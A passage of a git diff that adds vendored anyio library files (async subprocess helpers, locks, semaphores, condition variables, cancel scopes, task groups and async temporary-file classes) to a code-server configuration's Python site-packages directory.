+ :param stdin: one of :data:`subprocess.PIPE`, :data:`subprocess.DEVNULL`, + a file-like object, or `None`; ``input`` overrides this + :param stdout: one of :data:`subprocess.PIPE`, :data:`subprocess.DEVNULL`, + a file-like object, or `None` + :param stderr: one of :data:`subprocess.PIPE`, :data:`subprocess.DEVNULL`, + :data:`subprocess.STDOUT`, a file-like object, or `None` + :param check: if ``True``, raise :exc:`~subprocess.CalledProcessError` if the + process terminates with a return code other than 0 + :param cwd: If not ``None``, change the working directory to this before running the + command + :param env: if not ``None``, this mapping replaces the inherited environment + variables from the parent process + :param startupinfo: an instance of :class:`subprocess.STARTUPINFO` that can be used + to specify process startup parameters (Windows only) + :param creationflags: flags that can be used to control the creation of the + subprocess (see :class:`subprocess.Popen` for the specifics) + :param start_new_session: if ``true`` the setsid() system call will be made in the + child process prior to the execution of the subprocess. (POSIX only) + :param pass_fds: sequence of file descriptors to keep open between the parent and + child processes. (POSIX only) + :param user: effective user to run the process as (Python >= 3.9, POSIX only) + :param group: effective group to run the process as (Python >= 3.9, POSIX only) + :param extra_groups: supplementary groups to set in the subprocess (Python >= 3.9, + POSIX only) + :param umask: if not negative, this umask is applied in the child process before + running the given command (Python >= 3.9, POSIX only) + :return: an object representing the completed process + :raises ~subprocess.CalledProcessError: if ``check`` is ``True`` and the process + exits with a nonzero return code + + """ + + async def drain_stream(stream: AsyncIterable[bytes], index: int) -> None: + buffer = BytesIO() + async for chunk in stream: + buffer.write(chunk) + + stream_contents[index] = buffer.getvalue() + + if stdin is not None and input is not None: + raise ValueError("only one of stdin and input is allowed") + + async with await open_process( + command, + stdin=PIPE if input else stdin, + stdout=stdout, + stderr=stderr, + cwd=cwd, + env=env, + startupinfo=startupinfo, + creationflags=creationflags, + start_new_session=start_new_session, + pass_fds=pass_fds, + user=user, + group=group, + extra_groups=extra_groups, + umask=umask, + ) as process: + stream_contents: list[bytes | None] = [None, None] + async with create_task_group() as tg: + if process.stdout: + tg.start_soon(drain_stream, process.stdout, 0) + + if process.stderr: + tg.start_soon(drain_stream, process.stderr, 1) + + if process.stdin and input: + await process.stdin.send(input) + await process.stdin.aclose() + + await process.wait() + + output, errors = stream_contents + if check and process.returncode != 0: + raise CalledProcessError(cast(int, process.returncode), command, output, errors) + + return CompletedProcess(command, cast(int, process.returncode), output, errors) + + +async def open_process( + command: StrOrBytesPath | Sequence[StrOrBytesPath], + *, + stdin: int | IO[Any] | None = PIPE, + stdout: int | IO[Any] | None = PIPE, + stderr: int | IO[Any] | None = PIPE, + cwd: StrOrBytesPath | None = None, + env: Mapping[str, str] | None = None, + startupinfo: Any = None, + creationflags: int = 0, + start_new_session: bool = False, + pass_fds: Sequence[int] = (), + user: str | int | None = None, + group: str | int | None = None, + extra_groups: Iterable[str | int] | None = None, + umask: int = -1, +) -> Process: + """ + Start an external command in a subprocess. + + .. seealso:: :class:`subprocess.Popen` + + :param command: either a string to pass to the shell, or an iterable of strings + containing the executable name or path and its arguments + :param stdin: one of :data:`subprocess.PIPE`, :data:`subprocess.DEVNULL`, a + file-like object, or ``None`` + :param stdout: one of :data:`subprocess.PIPE`, :data:`subprocess.DEVNULL`, + a file-like object, or ``None`` + :param stderr: one of :data:`subprocess.PIPE`, :data:`subprocess.DEVNULL`, + :data:`subprocess.STDOUT`, a file-like object, or ``None`` + :param cwd: If not ``None``, the working directory is changed before executing + :param env: If env is not ``None``, it must be a mapping that defines the + environment variables for the new process + :param creationflags: flags that can be used to control the creation of the + subprocess (see :class:`subprocess.Popen` for the specifics) + :param startupinfo: an instance of :class:`subprocess.STARTUPINFO` that can be used + to specify process startup parameters (Windows only) + :param start_new_session: if ``true`` the setsid() system call will be made in the + child process prior to the execution of the subprocess. (POSIX only) + :param pass_fds: sequence of file descriptors to keep open between the parent and + child processes. (POSIX only) + :param user: effective user to run the process as (POSIX only) + :param group: effective group to run the process as (POSIX only) + :param extra_groups: supplementary groups to set in the subprocess (POSIX only) + :param umask: if not negative, this umask is applied in the child process before + running the given command (POSIX only) + :return: an asynchronous process object + + """ + kwargs: dict[str, Any] = {} + if user is not None: + kwargs["user"] = user + + if group is not None: + kwargs["group"] = group + + if extra_groups is not None: + kwargs["extra_groups"] = group + + if umask >= 0: + kwargs["umask"] = umask + + return await get_async_backend().open_process( + command, + stdin=stdin, + stdout=stdout, + stderr=stderr, + cwd=cwd, + env=env, + startupinfo=startupinfo, + creationflags=creationflags, + start_new_session=start_new_session, + pass_fds=pass_fds, + **kwargs, + ) diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_synchronization.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_synchronization.py new file mode 100755 index 0000000..c0ef27a --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_synchronization.py @@ -0,0 +1,753 @@ +from __future__ import annotations + +import math +from collections import deque +from collections.abc import Callable +from dataclasses import dataclass +from types import TracebackType +from typing import TypeVar + +from ..lowlevel import checkpoint_if_cancelled +from ._eventloop import get_async_backend +from ._exceptions import BusyResourceError, NoEventLoopError +from ._tasks import CancelScope +from ._testing import TaskInfo, get_current_task + +T = TypeVar("T") + + +@dataclass(frozen=True) +class EventStatistics: + """ + :ivar int tasks_waiting: number of tasks waiting on :meth:`~.Event.wait` + """ + + tasks_waiting: int + + +@dataclass(frozen=True) +class CapacityLimiterStatistics: + """ + :ivar int borrowed_tokens: number of tokens currently borrowed by tasks + :ivar float total_tokens: total number of available tokens + :ivar tuple borrowers: tasks or other objects currently holding tokens borrowed from + this limiter + :ivar int tasks_waiting: number of tasks waiting on + :meth:`~.CapacityLimiter.acquire` or + :meth:`~.CapacityLimiter.acquire_on_behalf_of` + """ + + borrowed_tokens: int + total_tokens: float + borrowers: tuple[object, ...] + tasks_waiting: int + + +@dataclass(frozen=True) +class LockStatistics: + """ + :ivar bool locked: flag indicating if this lock is locked or not + :ivar ~anyio.TaskInfo owner: task currently holding the lock (or ``None`` if the + lock is not held by any task) + :ivar int tasks_waiting: number of tasks waiting on :meth:`~.Lock.acquire` + """ + + locked: bool + owner: TaskInfo | None + tasks_waiting: int + + +@dataclass(frozen=True) +class ConditionStatistics: + """ + :ivar int tasks_waiting: number of tasks blocked on :meth:`~.Condition.wait` + :ivar ~anyio.LockStatistics lock_statistics: statistics of the underlying + :class:`~.Lock` + """ + + tasks_waiting: int + lock_statistics: LockStatistics + + +@dataclass(frozen=True) +class SemaphoreStatistics: + """ + :ivar int tasks_waiting: number of tasks waiting on :meth:`~.Semaphore.acquire` + + """ + + tasks_waiting: int + + +class Event: + def __new__(cls) -> Event: + try: + return get_async_backend().create_event() + except NoEventLoopError: + return EventAdapter() + + def set(self) -> None: + """Set the flag, notifying all listeners.""" + raise NotImplementedError + + def is_set(self) -> bool: + """Return ``True`` if the flag is set, ``False`` if not.""" + raise NotImplementedError + + async def wait(self) -> None: + """ + Wait until the flag has been set. + + If the flag has already been set when this method is called, it returns + immediately. + + """ + raise NotImplementedError + + def statistics(self) -> EventStatistics: + """Return statistics about the current state of this event.""" + raise NotImplementedError + + +class EventAdapter(Event): + _internal_event: Event | None = None + _is_set: bool = False + + def __new__(cls) -> EventAdapter: + return object.__new__(cls) + + @property + def _event(self) -> Event: + if self._internal_event is None: + self._internal_event = get_async_backend().create_event() + if self._is_set: + self._internal_event.set() + + return self._internal_event + + def set(self) -> None: + if self._internal_event is None: + self._is_set = True + else: + self._event.set() + + def is_set(self) -> bool: + if self._internal_event is None: + return self._is_set + + return self._internal_event.is_set() + + async def wait(self) -> None: + await self._event.wait() + + def statistics(self) -> EventStatistics: + if self._internal_event is None: + return EventStatistics(tasks_waiting=0) + + return self._internal_event.statistics() + + +class Lock: + def __new__(cls, *, fast_acquire: bool = False) -> Lock: + try: + return get_async_backend().create_lock(fast_acquire=fast_acquire) + except NoEventLoopError: + return LockAdapter(fast_acquire=fast_acquire) + + async def __aenter__(self) -> None: + await self.acquire() + + async def __aexit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> None: + self.release() + + async def acquire(self) -> None: + """Acquire the lock.""" + raise NotImplementedError + + def acquire_nowait(self) -> None: + """ + Acquire the lock, without blocking. + + :raises ~anyio.WouldBlock: if the operation would block + + """ + raise NotImplementedError + + def release(self) -> None: + """Release the lock.""" + raise NotImplementedError + + def locked(self) -> bool: + """Return True if the lock is currently held.""" + raise NotImplementedError + + def statistics(self) -> LockStatistics: + """ + Return statistics about the current state of this lock. + + .. versionadded:: 3.0 + """ + raise NotImplementedError + + +class LockAdapter(Lock): + _internal_lock: Lock | None = None + + def __new__(cls, *, fast_acquire: bool = False) -> LockAdapter: + return object.__new__(cls) + + def __init__(self, *, fast_acquire: bool = False): + self._fast_acquire = fast_acquire + + @property + def _lock(self) -> Lock: + if self._internal_lock is None: + self._internal_lock = get_async_backend().create_lock( + fast_acquire=self._fast_acquire + ) + + return self._internal_lock + + async def __aenter__(self) -> None: + await self._lock.acquire() + + async def __aexit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> None: + if self._internal_lock is not None: + self._internal_lock.release() + + async def acquire(self) -> None: + """Acquire the lock.""" + await self._lock.acquire() + + def acquire_nowait(self) -> None: + """ + Acquire the lock, without blocking. + + :raises ~anyio.WouldBlock: if the operation would block + + """ + self._lock.acquire_nowait() + + def release(self) -> None: + """Release the lock.""" + self._lock.release() + + def locked(self) -> bool: + """Return True if the lock is currently held.""" + return self._lock.locked() + + def statistics(self) -> LockStatistics: + """ + Return statistics about the current state of this lock. + + .. versionadded:: 3.0 + + """ + if self._internal_lock is None: + return LockStatistics(False, None, 0) + + return self._internal_lock.statistics() + + +class Condition: + _owner_task: TaskInfo | None = None + + def __init__(self, lock: Lock | None = None): + self._lock = lock or Lock() + self._waiters: deque[Event] = deque() + + async def __aenter__(self) -> None: + await self.acquire() + + async def __aexit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> None: + self.release() + + def _check_acquired(self) -> None: + if self._owner_task != get_current_task(): + raise RuntimeError("The current task is not holding the underlying lock") + + async def acquire(self) -> None: + """Acquire the underlying lock.""" + await self._lock.acquire() + self._owner_task = get_current_task() + + def acquire_nowait(self) -> None: + """ + Acquire the underlying lock, without blocking. + + :raises ~anyio.WouldBlock: if the operation would block + + """ + self._lock.acquire_nowait() + self._owner_task = get_current_task() + + def release(self) -> None: + """Release the underlying lock.""" + self._lock.release() + + def locked(self) -> bool: + """Return True if the lock is set.""" + return self._lock.locked() + + def notify(self, n: int = 1) -> None: + """Notify exactly n listeners.""" + self._check_acquired() + for _ in range(n): + try: + event = self._waiters.popleft() + except IndexError: + break + + event.set() + + def notify_all(self) -> None: + """Notify all the listeners.""" + self._check_acquired() + for event in self._waiters: + event.set() + + self._waiters.clear() + + async def wait(self) -> None: + """Wait for a notification.""" + await checkpoint_if_cancelled() + self._check_acquired() + event = Event() + self._waiters.append(event) + self.release() + try: + await event.wait() + except BaseException: + if not event.is_set(): + self._waiters.remove(event) + + raise + finally: + with CancelScope(shield=True): + await self.acquire() + + async def wait_for(self, predicate: Callable[[], T]) -> T: + """ + Wait until a predicate becomes true. + + :param predicate: a callable that returns a truthy value when the condition is + met + :return: the result of the predicate + + .. versionadded:: 4.11.0 + + """ + while not (result := predicate()): + await self.wait() + + return result + + def statistics(self) -> ConditionStatistics: + """ + Return statistics about the current state of this condition. + + .. versionadded:: 3.0 + """ + return ConditionStatistics(len(self._waiters), self._lock.statistics()) + + +class Semaphore: + def __new__( + cls, + initial_value: int, + *, + max_value: int | None = None, + fast_acquire: bool = False, + ) -> Semaphore: + try: + return get_async_backend().create_semaphore( + initial_value, max_value=max_value, fast_acquire=fast_acquire + ) + except NoEventLoopError: + return SemaphoreAdapter(initial_value, max_value=max_value) + + def __init__( + self, + initial_value: int, + *, + max_value: int | None = None, + fast_acquire: bool = False, + ): + if not isinstance(initial_value, int): + raise TypeError("initial_value must be an integer") + if initial_value < 0: + raise ValueError("initial_value must be >= 0") + if max_value is not None: + if not isinstance(max_value, int): + raise TypeError("max_value must be an integer or None") + if max_value < initial_value: + raise ValueError( + "max_value must be equal to or higher than initial_value" + ) + + self._fast_acquire = fast_acquire + + async def __aenter__(self) -> Semaphore: + await self.acquire() + return self + + async def __aexit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> None: + self.release() + + async def acquire(self) -> None: + """Decrement the semaphore value, blocking if necessary.""" + raise NotImplementedError + + def acquire_nowait(self) -> None: + """ + Acquire the underlying lock, without blocking. + + :raises ~anyio.WouldBlock: if the operation would block + + """ + raise NotImplementedError + + def release(self) -> None: + """Increment the semaphore value.""" + raise NotImplementedError + + @property + def value(self) -> int: + """The current value of the semaphore.""" + raise NotImplementedError + + @property + def max_value(self) -> int | None: + """The maximum value of the semaphore.""" + raise NotImplementedError + + def statistics(self) -> SemaphoreStatistics: + """ + Return statistics about the current state of this semaphore. + + .. versionadded:: 3.0 + """ + raise NotImplementedError + + +class SemaphoreAdapter(Semaphore): + _internal_semaphore: Semaphore | None = None + + def __new__( + cls, + initial_value: int, + *, + max_value: int | None = None, + fast_acquire: bool = False, + ) -> SemaphoreAdapter: + return object.__new__(cls) + + def __init__( + self, + initial_value: int, + *, + max_value: int | None = None, + fast_acquire: bool = False, + ) -> None: + super().__init__(initial_value, max_value=max_value, fast_acquire=fast_acquire) + self._initial_value = initial_value + self._max_value = max_value + + @property + def _semaphore(self) -> Semaphore: + if self._internal_semaphore is None: + self._internal_semaphore = get_async_backend().create_semaphore( + self._initial_value, max_value=self._max_value + ) + + return self._internal_semaphore + + async def acquire(self) -> None: + await self._semaphore.acquire() + + def acquire_nowait(self) -> None: + self._semaphore.acquire_nowait() + + def release(self) -> None: + self._semaphore.release() + + @property + def value(self) -> int: + if self._internal_semaphore is None: + return self._initial_value + + return self._semaphore.value + + @property + def max_value(self) -> int | None: + return self._max_value + + def statistics(self) -> SemaphoreStatistics: + if self._internal_semaphore is None: + return SemaphoreStatistics(tasks_waiting=0) + + return self._semaphore.statistics() + + +class CapacityLimiter: + def __new__(cls, total_tokens: float) -> CapacityLimiter: + try: + return get_async_backend().create_capacity_limiter(total_tokens) + except NoEventLoopError: + return CapacityLimiterAdapter(total_tokens) + + async def __aenter__(self) -> None: + raise NotImplementedError + + async def __aexit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> None: + raise NotImplementedError + + @property + def total_tokens(self) -> float: + """ + The total number of tokens available for borrowing. + + This is a read-write property. If the total number of tokens is increased, the + proportionate number of tasks waiting on this limiter will be granted their + tokens. + + .. versionchanged:: 3.0 + The property is now writable. + .. versionchanged:: 4.12 + The value can now be set to 0. + + """ + raise NotImplementedError + + @total_tokens.setter + def total_tokens(self, value: float) -> None: + raise NotImplementedError + + @property + def borrowed_tokens(self) -> int: + """The number of tokens that have currently been borrowed.""" + raise NotImplementedError + + @property + def available_tokens(self) -> float: + """The number of tokens currently available to be borrowed""" + raise NotImplementedError + + def acquire_nowait(self) -> None: + """ + Acquire a token for the current task without waiting for one to become + available. + + :raises ~anyio.WouldBlock: if there are no tokens available for borrowing + + """ + raise NotImplementedError + + def acquire_on_behalf_of_nowait(self, borrower: object) -> None: + """ + Acquire a token without waiting for one to become available. + + :param borrower: the entity borrowing a token + :raises ~anyio.WouldBlock: if there are no tokens available for borrowing + + """ + raise NotImplementedError + + async def acquire(self) -> None: + """ + Acquire a token for the current task, waiting if necessary for one to become + available. + + """ + raise NotImplementedError + + async def acquire_on_behalf_of(self, borrower: object) -> None: + """ + Acquire a token, waiting if necessary for one to become available. + + :param borrower: the entity borrowing a token + + """ + raise NotImplementedError + + def release(self) -> None: + """ + Release the token held by the current task. + + :raises RuntimeError: if the current task has not borrowed a token from this + limiter. + + """ + raise NotImplementedError + + def release_on_behalf_of(self, borrower: object) -> None: + """ + Release the token held by the given borrower. + + :raises RuntimeError: if the borrower has not borrowed a token from this + limiter. + + """ + raise NotImplementedError + + def statistics(self) -> CapacityLimiterStatistics: + """ + Return statistics about the current state of this limiter. + + .. versionadded:: 3.0 + + """ + raise NotImplementedError + + +class CapacityLimiterAdapter(CapacityLimiter): + _internal_limiter: CapacityLimiter | None = None + + def __new__(cls, total_tokens: float) -> CapacityLimiterAdapter: + return object.__new__(cls) + + def __init__(self, total_tokens: float) -> None: + self.total_tokens = total_tokens + + @property + def _limiter(self) -> CapacityLimiter: + if self._internal_limiter is None: + self._internal_limiter = get_async_backend().create_capacity_limiter( + self._total_tokens + ) + + return self._internal_limiter + + async def __aenter__(self) -> None: + await self._limiter.__aenter__() + + async def __aexit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> None: + return await self._limiter.__aexit__(exc_type, exc_val, exc_tb) + + @property + def total_tokens(self) -> float: + if self._internal_limiter is None: + return self._total_tokens + + return self._internal_limiter.total_tokens + + @total_tokens.setter + def total_tokens(self, value: float) -> None: + if not isinstance(value, int) and value is not math.inf: + raise TypeError("total_tokens must be an int or math.inf") + elif value < 1: + raise ValueError("total_tokens must be >= 1") + + if self._internal_limiter is None: + self._total_tokens = value + return + + self._limiter.total_tokens = value + + @property + def borrowed_tokens(self) -> int: + if self._internal_limiter is None: + return 0 + + return self._internal_limiter.borrowed_tokens + + @property + def available_tokens(self) -> float: + if self._internal_limiter is None: + return self._total_tokens + + return self._internal_limiter.available_tokens + + def acquire_nowait(self) -> None: + self._limiter.acquire_nowait() + + def acquire_on_behalf_of_nowait(self, borrower: object) -> None: + self._limiter.acquire_on_behalf_of_nowait(borrower) + + async def acquire(self) -> None: + await self._limiter.acquire() + + async def acquire_on_behalf_of(self, borrower: object) -> None: + await self._limiter.acquire_on_behalf_of(borrower) + + def release(self) -> None: + self._limiter.release() + + def release_on_behalf_of(self, borrower: object) -> None: + self._limiter.release_on_behalf_of(borrower) + + def statistics(self) -> CapacityLimiterStatistics: + if self._internal_limiter is None: + return CapacityLimiterStatistics( + borrowed_tokens=0, + total_tokens=self.total_tokens, + borrowers=(), + tasks_waiting=0, + ) + + return self._internal_limiter.statistics() + + +class ResourceGuard: + """ + A context manager for ensuring that a resource is only used by a single task at a + time. + + Entering this context manager while the previous has not exited it yet will trigger + :exc:`BusyResourceError`. + + :param action: the action to guard against (visible in the :exc:`BusyResourceError` + when triggered, e.g. "Another task is already {action} this resource") + + .. versionadded:: 4.1 + """ + + __slots__ = "action", "_guarded" + + def __init__(self, action: str = "using"): + self.action: str = action + self._guarded = False + + def __enter__(self) -> None: + if self._guarded: + raise BusyResourceError(self.action) + + self._guarded = True + + def __exit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> None: + self._guarded = False diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_tasks.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_tasks.py new file mode 100755 index 0000000..0688bfe --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_tasks.py @@ -0,0 +1,173 @@ +from __future__ import annotations + +import math +from collections.abc import Generator +from contextlib import contextmanager +from types import TracebackType + +from ..abc._tasks import TaskGroup, TaskStatus +from ._eventloop import get_async_backend + + +class _IgnoredTaskStatus(TaskStatus[object]): + def started(self, value: object = None) -> None: + pass + + +TASK_STATUS_IGNORED = _IgnoredTaskStatus() + + +class CancelScope: + """ + Wraps a unit of work that can be made separately cancellable. + + :param deadline: The time (clock value) when this scope is cancelled automatically + :param shield: ``True`` to shield the cancel scope from external cancellation + :raises NoEventLoopError: if no supported asynchronous event loop is running in the + current thread + """ + + def __new__( + cls, *, deadline: float = math.inf, shield: bool = False + ) -> CancelScope: + return get_async_backend().create_cancel_scope(shield=shield, deadline=deadline) + + def cancel(self, reason: str | None = None) -> None: + """ + Cancel this scope immediately. + + :param reason: a message describing the reason for the cancellation + + """ + raise NotImplementedError + + @property + def deadline(self) -> float: + """ + The time (clock value) when this scope is cancelled automatically. + + Will be ``float('inf')`` if no timeout has been set. + + """ + raise NotImplementedError + + @deadline.setter + def deadline(self, value: float) -> None: + raise NotImplementedError + + @property + def cancel_called(self) -> bool: + """``True`` if :meth:`cancel` has been called.""" + raise NotImplementedError + + @property + def cancelled_caught(self) -> bool: + """ + ``True`` if this scope suppressed a cancellation exception it itself raised. + + This is typically used to check if any work was interrupted, or to see if the + scope was cancelled due to its deadline being reached. The value will, however, + only be ``True`` if the cancellation was triggered by the scope itself (and not + an outer scope). + + """ + raise NotImplementedError + + @property + def shield(self) -> bool: + """ + ``True`` if this scope is shielded from external cancellation. + + While a scope is shielded, it will not receive cancellations from outside. + + """ + raise NotImplementedError + + @shield.setter + def shield(self, value: bool) -> None: + raise NotImplementedError + + def __enter__(self) -> CancelScope: + raise NotImplementedError + + def __exit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> bool: + raise NotImplementedError + + +@contextmanager +def fail_after( + delay: float | None, shield: bool = False +) -> Generator[CancelScope, None, None]: + """ + Create a context manager which raises a :class:`TimeoutError` if does not finish in + time. + + :param delay: maximum allowed time (in seconds) before raising the exception, or + ``None`` to disable the timeout + :param shield: ``True`` to shield the cancel scope from external cancellation + :return: a context manager that yields a cancel scope + :rtype: :class:`~typing.ContextManager`\\[:class:`~anyio.CancelScope`\\] + :raises NoEventLoopError: if no supported asynchronous event loop is running in the + current thread + + """ + current_time = get_async_backend().current_time + deadline = (current_time() + delay) if delay is not None else math.inf + with get_async_backend().create_cancel_scope( + deadline=deadline, shield=shield + ) as cancel_scope: + yield cancel_scope + + if cancel_scope.cancelled_caught and current_time() >= cancel_scope.deadline: + raise TimeoutError + + +def move_on_after(delay: float | None, shield: bool = False) -> CancelScope: + """ + Create a cancel scope with a deadline that expires after the given delay. + + :param delay: maximum allowed time (in seconds) before exiting the context block, or + ``None`` to disable the timeout + :param shield: ``True`` to shield the cancel scope from external cancellation + :return: a cancel scope + :raises NoEventLoopError: if no supported asynchronous event loop is running in the + current thread + + """ + deadline = ( + (get_async_backend().current_time() + delay) if delay is not None else math.inf + ) + return get_async_backend().create_cancel_scope(deadline=deadline, shield=shield) + + +def current_effective_deadline() -> float: + """ + Return the nearest deadline among all the cancel scopes effective for the current + task. + + :return: a clock value from the event loop's internal clock (or ``float('inf')`` if + there is no deadline in effect, or ``float('-inf')`` if the current scope has + been cancelled) + :rtype: float + :raises NoEventLoopError: if no supported asynchronous event loop is running in the + current thread + + """ + return get_async_backend().current_effective_deadline() + + +def create_task_group() -> TaskGroup: + """ + Create a task group. + + :return: a task group + :raises NoEventLoopError: if no supported asynchronous event loop is running in the + current thread + + """ + return get_async_backend().create_task_group() diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_tempfile.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_tempfile.py new file mode 100755 index 0000000..fbb6b14 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_tempfile.py @@ -0,0 +1,616 @@ +from __future__ import annotations + +import os +import sys +import tempfile +from collections.abc import Iterable +from io import BytesIO, TextIOWrapper +from types import TracebackType +from typing import ( + TYPE_CHECKING, + Any, + AnyStr, + Generic, + overload, +) + +from .. import to_thread +from .._core._fileio import AsyncFile +from ..lowlevel import checkpoint_if_cancelled + +if TYPE_CHECKING: + from _typeshed import OpenBinaryMode, OpenTextMode, ReadableBuffer, WriteableBuffer + + +class TemporaryFile(Generic[AnyStr]): + """ + An asynchronous temporary file that is automatically created and cleaned up. + + This class provides an asynchronous context manager interface to a temporary file. + The file is created using Python's standard `tempfile.TemporaryFile` function in a + background thread, and is wrapped as an asynchronous file using `AsyncFile`. + + :param mode: The mode in which the file is opened. Defaults to "w+b". + :param buffering: The buffering policy (-1 means the default buffering). + :param encoding: The encoding used to decode or encode the file. Only applicable in + text mode. + :param newline: Controls how universal newlines mode works (only applicable in text + mode). + :param suffix: The suffix for the temporary file name. + :param prefix: The prefix for the temporary file name. + :param dir: The directory in which the temporary file is created. + :param errors: The error handling scheme used for encoding/decoding errors. + """ + + _async_file: AsyncFile[AnyStr] + + @overload + def __init__( + self: TemporaryFile[bytes], + mode: OpenBinaryMode = ..., + buffering: int = ..., + encoding: str | None = ..., + newline: str | None = ..., + suffix: str | None = ..., + prefix: str | None = ..., + dir: str | None = ..., + *, + errors: str | None = ..., + ): ... + @overload + def __init__( + self: TemporaryFile[str], + mode: OpenTextMode, + buffering: int = ..., + encoding: str | None = ..., + newline: str | None = ..., + suffix: str | None = ..., + prefix: str | None = ..., + dir: str | None = ..., + *, + errors: str | None = ..., + ): ... + + def __init__( + self, + mode: OpenTextMode | OpenBinaryMode = "w+b", + buffering: int = -1, + encoding: str | None = None, + newline: str | None = None, + suffix: str | None = None, + prefix: str | None = None, + dir: str | None = None, + *, + errors: str | None = None, + ) -> None: + self.mode = mode + self.buffering = buffering + self.encoding = encoding + self.newline = newline + self.suffix: str | None = suffix + self.prefix: str | None = prefix + self.dir: str | None = dir + self.errors = errors + + async def __aenter__(self) -> AsyncFile[AnyStr]: + fp = await to_thread.run_sync( + lambda: tempfile.TemporaryFile( + self.mode, + self.buffering, + self.encoding, + self.newline, + self.suffix, + self.prefix, + self.dir, + errors=self.errors, + ) + ) + self._async_file = AsyncFile(fp) + return self._async_file + + async def __aexit__( + self, + exc_type: type[BaseException] | None, + exc_value: BaseException | None, + traceback: TracebackType | None, + ) -> None: + await self._async_file.aclose() + + +class NamedTemporaryFile(Generic[AnyStr]): + """ + An asynchronous named temporary file that is automatically created and cleaned up. + + This class provides an asynchronous context manager for a temporary file with a + visible name in the file system. It uses Python's standard + :func:`~tempfile.NamedTemporaryFile` function and wraps the file object with + :class:`AsyncFile` for asynchronous operations. + + :param mode: The mode in which the file is opened. Defaults to "w+b". + :param buffering: The buffering policy (-1 means the default buffering). + :param encoding: The encoding used to decode or encode the file. Only applicable in + text mode. + :param newline: Controls how universal newlines mode works (only applicable in text + mode). + :param suffix: The suffix for the temporary file name. + :param prefix: The prefix for the temporary file name. + :param dir: The directory in which the temporary file is created. + :param delete: Whether to delete the file when it is closed. + :param errors: The error handling scheme used for encoding/decoding errors. + :param delete_on_close: (Python 3.12+) Whether to delete the file on close. + """ + + _async_file: AsyncFile[AnyStr] + + @overload + def __init__( + self: NamedTemporaryFile[bytes], + mode: OpenBinaryMode = ..., + buffering: int = ..., + encoding: str | None = ..., + newline: str | None = ..., + suffix: str | None = ..., + prefix: str | None = ..., + dir: str | None = ..., + delete: bool = ..., + *, + errors: str | None = ..., + delete_on_close: bool = ..., + ): ... + @overload + def __init__( + self: NamedTemporaryFile[str], + mode: OpenTextMode, + buffering: int = ..., + encoding: str | None = ..., + newline: str | None = ..., + suffix: str | None = ..., + prefix: str | None = ..., + dir: str | None = ..., + delete: bool = ..., + *, + errors: str | None = ..., + delete_on_close: bool = ..., + ): ... + + def __init__( + self, + mode: OpenBinaryMode | OpenTextMode = "w+b", + buffering: int = -1, + encoding: str | None = None, + newline: str | None = None, + suffix: str | None = None, + prefix: str | None = None, + dir: str | None = None, + delete: bool = True, + *, + errors: str | None = None, + delete_on_close: bool = True, + ) -> None: + self._params: dict[str, Any] = { + "mode": mode, + "buffering": buffering, + "encoding": encoding, + "newline": newline, + "suffix": suffix, + "prefix": prefix, + "dir": dir, + "delete": delete, + "errors": errors, + } + if sys.version_info >= (3, 12): + self._params["delete_on_close"] = delete_on_close + + async def __aenter__(self) -> AsyncFile[AnyStr]: + fp = await to_thread.run_sync( + lambda: tempfile.NamedTemporaryFile(**self._params) + ) + self._async_file = AsyncFile(fp) + return self._async_file + + async def __aexit__( + self, + exc_type: type[BaseException] | None, + exc_value: BaseException | None, + traceback: TracebackType | None, + ) -> None: + await self._async_file.aclose() + + +class SpooledTemporaryFile(AsyncFile[AnyStr]): + """ + An asynchronous spooled temporary file that starts in memory and is spooled to disk. + + This class provides an asynchronous interface to a spooled temporary file, much like + Python's standard :class:`~tempfile.SpooledTemporaryFile`. It supports asynchronous + write operations and provides a method to force a rollover to disk. + + :param max_size: Maximum size in bytes before the file is rolled over to disk. + :param mode: The mode in which the file is opened. Defaults to "w+b". + :param buffering: The buffering policy (-1 means the default buffering). + :param encoding: The encoding used to decode or encode the file (text mode only). + :param newline: Controls how universal newlines mode works (text mode only). + :param suffix: The suffix for the temporary file name. + :param prefix: The prefix for the temporary file name. + :param dir: The directory in which the temporary file is created. + :param errors: The error handling scheme used for encoding/decoding errors. + """ + + _rolled: bool = False + + @overload + def __init__( + self: SpooledTemporaryFile[bytes], + max_size: int = ..., + mode: OpenBinaryMode = ..., + buffering: int = ..., + encoding: str | None = ..., + newline: str | None = ..., + suffix: str | None = ..., + prefix: str | None = ..., + dir: str | None = ..., + *, + errors: str | None = ..., + ): ... + @overload + def __init__( + self: SpooledTemporaryFile[str], + max_size: int = ..., + mode: OpenTextMode = ..., + buffering: int = ..., + encoding: str | None = ..., + newline: str | None = ..., + suffix: str | None = ..., + prefix: str | None = ..., + dir: str | None = ..., + *, + errors: str | None = ..., + ): ... + + def __init__( + self, + max_size: int = 0, + mode: OpenBinaryMode | OpenTextMode = "w+b", + buffering: int = -1, + encoding: str | None = None, + newline: str | None = None, + suffix: str | None = None, + prefix: str | None = None, + dir: str | None = None, + *, + errors: str | None = None, + ) -> None: + self._tempfile_params: dict[str, Any] = { + "mode": mode, + "buffering": buffering, + "encoding": encoding, + "newline": newline, + "suffix": suffix, + "prefix": prefix, + "dir": dir, + "errors": errors, + } + self._max_size = max_size + if "b" in mode: + super().__init__(BytesIO()) # 